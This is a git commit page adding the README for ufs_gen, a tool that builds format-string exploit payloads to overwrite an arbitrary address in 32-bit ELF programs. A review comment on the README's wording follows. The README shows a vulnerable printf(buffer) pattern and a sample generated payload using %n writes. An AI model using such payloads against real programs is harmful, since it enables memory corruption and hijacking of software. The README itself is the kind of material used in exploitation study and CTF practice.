author Olivier Gayot <duskcoder@gmail.com> 2014-01-26 15:05:01 +0000
committer Olivier Gayot <duskcoder@gmail.com> 2014-01-27 00:10:11 +0000
commit b3122c208b43e8dd775b49c5023f728e14e0156e (patch)
tree d1fd0d48461e4afa7789fec4f8da5ee9c9f14d90 /README
initial commit
Diffstat (limited to 'README')
-rw-r--r-- README 51
1 files changed, 51 insertions, 0 deletions
diff --git a/README b/README
new file mode 100644
index 0000000..b2d9679
--- /dev/null
+++ b/README
@@ -0,0 +1,51 @@
+ufs_gen
+=======
+
+This software allows you to generate a payload which may override an address
+with the value of your choice.
+
+The syntax is quite simple:
+
+There are three parameters needed for the program to run correctly.
+
+stackidx: this parameter specifies how many dwords you need to access the
+beginning of your buffer (or payload).
+
+override: the address to override
+
+with: the value to inject at the address overriden
+
+This software is intended to work with an ELF32 generated by a typical code.
+
+example:
+
+int function(const char *payload)
+{
+ char buffer[BUFSIZ];
+
+ strncpy(buffer, payload, sizeof(buffer));
+ buffer[sizeof(buffer) - 1] = '\0';
+
+ printf(buffer);
+
+ return 0;
+}
+
+The support of ELF64 and other formats is intended but not written yet.
+Although the option 'addrsize' might already be used to specify if an address
+is not 4 bytes long, there is very few chances that it would work correctly.
+
+The support of printf(payload) directly (i.e. without a temporary buffer) is
+also planned.
+
+Example
+=======
+
+user@localhost$ ./ufs_gen --override 0x11223344 --with 0x55667788 --stackidx 4
+D3"E3"F3"G3"%120x%4$n%239x%5$n%239x%6$n%239x%7$n
+
+License
+=======
+
+This software is free software covered by the GPL license v2. You should
+read the COPYING file to understand what is implied.
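Review bot: the parameter list near the top documents the options as bare names (stackidx, override, with), while the Example section invokes them as --stackidx, --override and --with, and 'addrsize' appears only in the ELF64 paragraph without an entry of its own. I would list every option in its command-line form in one place, including addrsize with its default and a note that values other than 4 are untested. The stackidx description ("how many dwords you need to access the beginning of your buffer") would be clearer if it said it is the positional index of the first argument that falls inside the buffer, which is what the %4$n in the sample output corresponds to for --stackidx 4. The sample output shows only three visible characters per 4-byte address, so it is worth stating that the payload contains non-printable bytes and that a copy of the README text will not reproduce it. Smaller points: "overriden" should be "overridden", "there is very few chances" should be "there is very little chance", the lowercase "example:" before the C function and the later "Example" heading are easy to confuse (the first could be titled as the target code pattern), and the License section should say whether this is GPL v2 only or v2 or later.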